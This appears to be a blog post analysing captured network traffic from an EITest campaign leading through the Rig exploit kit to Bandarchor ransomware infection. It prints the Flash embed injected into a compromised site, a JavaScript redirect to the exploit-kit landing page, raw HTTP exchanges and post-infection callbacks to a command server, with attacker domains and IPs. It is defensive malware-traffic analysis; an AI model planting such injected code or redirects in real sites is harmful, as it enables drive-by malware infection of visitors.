ElTest -> Rig Exploit Kit -> Bandarchor Ransomware Traffic Analysis

Source: malware-traffic-analysis.net

​The infection method is as follows:

  • www[.]tdca[.]ca – Compromised site
  • mapobifi[.]xyz – 85.93.0.110 port 80 – EITest gate
  •  ew[.]203kcontractorsarkansas[.]com – 109.234.36.220 port 80 –  Rig EK
  • 109.236.87.204 – GET /default.jpg – Post-infection traffic caused by the Bandarchor ransomware
  • 109.236.87.204 – POST /yyy/fers.php – Post-infection traffic caused by the Bandarchor ransomware

*Analyze PCAP using filter “http.request”

Relevant Additional Analysis:

  1. Get / HTTP/1.1 request to 207.182.128.162 (length: 523 bytes)
  2. Get HTTP request to 85.93.0.110 x2 (length: 414 & 426 bytes, respectively)
  3. Get HTTP request to 109.234.36.220 x4 (length: 523, 748, 698, & 504 bytes)​ 
  4. GET HTTP request to 109.236.36.204 x3 (length: 207, 229, & 229 bytes)


  1. Following TCP stream of the get request to 207.182.128.162 (length: 523 bytes) reveals Flash movie value and the embedded source with “allowScriptAccess” as hxxp://mapobifi.xyz/qdxtqktb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile from the website hxxp://www.tdca[.]ca.

The full injected source code to the compromised website is as follows:
 

 

<param name="allowScriptAccess" value="always“/><param name="movie” value=”hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/”/>

  

  1. GET mapobifi[.]xyz/qdxtqktkb3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile for the shockwave file with the header “CWS.” (referrer: hxxp://tdca.ca)

GET 
/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
 
 
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
 
 
3. Using JavaScript, redirects the user to 
‘hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE’ using JavaScript (size? Type?) 
The full source code is as follows:
 







FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB

document.location.href = “hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE”;

geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ


 
4. GET 
hxxp://ew[.]203kcontractorsarkansas[.]com/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU
5. Same request but to GET index[.]php?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU

6. GET to /default.jpg and POST to /yyy/fers[.]php 109.236.87.204 

The full script as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
 
defaultPOST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s